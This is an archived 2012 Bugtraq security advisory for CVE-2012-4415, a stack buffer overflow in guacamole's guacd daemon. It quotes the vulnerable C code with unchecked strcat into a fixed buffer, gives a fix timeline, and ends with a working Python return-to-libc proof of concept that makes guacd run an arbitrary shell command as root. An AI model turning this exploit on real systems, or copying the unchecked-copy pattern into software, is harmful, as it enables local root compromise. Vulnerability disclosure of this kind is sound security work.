lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <84wqzj36h7.fsf@sauna.l.org>
Date: Mon, 24 Sep 2012 16:17:40 +0300
From: Timo Juhani Lindfors <timo.lindfors@....fi>
To: bugtraq@...urityfocus.com
Subject: CVE-2012-4415: guacamole local root vulnerability

Overview
========

  "Guacamole is an HTML5 web application that provides access to desktop
   environments using remote desktop protocols such as VNC or RDP. A
   centralized server acts as a tunnel and proxy, allowing access to
   multiple desktops through a web browser. No plugins are needed: the
   client requires nothing more than a web browser supporting HTML5 and
   AJAX."

      -- http://guac-dev.org/

guacamole 0.6.0 contains a trivial buffer overflow vulnerability that
allows connected users to execute code with the privileges of the guacd
daemon. In the Debian distribution the guacd 0.6.0-1 daemon runs as root
and allows connections from unauthenticated users. However, it
fortunately only listens on localhost by default.

Analysis
========

The server part of guacamole consists of a web application written in
Java and a proxy daemon ("guacd") written in C. The proxy part parses
the guacamole protocol using the libguac library. This library contains
a trivial buffer overflow vulnerability. As you can see in the following
quote the code fails to validate the length of the user supplied input
before using strcpy to copy it to a fixed size buffer in stack:

guac_client_plugin* guac_client_plugin_open(const char* protocol) {

    guac_client_plugin* plugin;

    /* Reference to dlopen()'d plugin */
    void* client_plugin_handle;

    /* Client args description */
    const char** client_args;

    /* Pluggable client */
    char protocol_lib[256] = "libguac-client-";
    
    union {
        guac_client_init_handler* client_init;
        void* obj;
    } alias;

    /* Add protocol and .so suffix to protocol_lib */
    strcat(protocol_lib, protocol);
    strcat(protocol_lib, ".so");

    /* Load client plugin */
    client_plugin_handle = dlopen(protocol_lib, RTLD_LAZY);
    if (!client_plugin_handle) {
        guac_error = GUAC_STATUS_BAD_ARGUMENT;
        guac_error_message = dlerror();
        return NULL;


Timeline
========

2012-08-23 Vulnerability discovered and reported to upstream
2012-08-23 Upstream fixes the issue in http://guac-dev.org/trac/changeset/7dcefa744b4a38825619c00ae8b47e5bae6e38c0/libguac
2012-09-12 Fixed version (libguac 0.6.0-2) is uploaded to Debian
2012-09-19 Upstream releases 0.6.3 that includes the fix

Proof of concept
================

#!/usr/bin/python
# CVE-2012-4415: PoC for guacd buffer overflow vulnerability
#
# Copyright (c) 2012 Timo Juhani Lindfors <timo.lindfors@....fi>
#
# Allows arbitrary code execution on Debian i386 guacd 0.6.0-1 with
# default configuration. Uses return-to-libc to bypass non-executable
# stack.
#
import socket, struct
PROTOCOL_ADDRESS = 0xbf807e9f
SYSTEM_ADDRESS = 0xb76e7640
class GuacdPOC:
    def __init__(self, command):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.connect(('localhost', 4822))
        self.s("select")
        self.c(",")
        protocol = (command + "; " + "#" * 265)[:265]
        protocol += struct.pack("L", PROTOCOL_ADDRESS)
        protocol += struct.pack("L", SYSTEM_ADDRESS)
        self.s(protocol)
        self.c(";")
    def s(self, x):
        self.sock.send("%d.%s" % (len(x), x))
    def c(self, x):
        self.sock.send(x)
GuacdPOC("touch /tmp/owned")

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ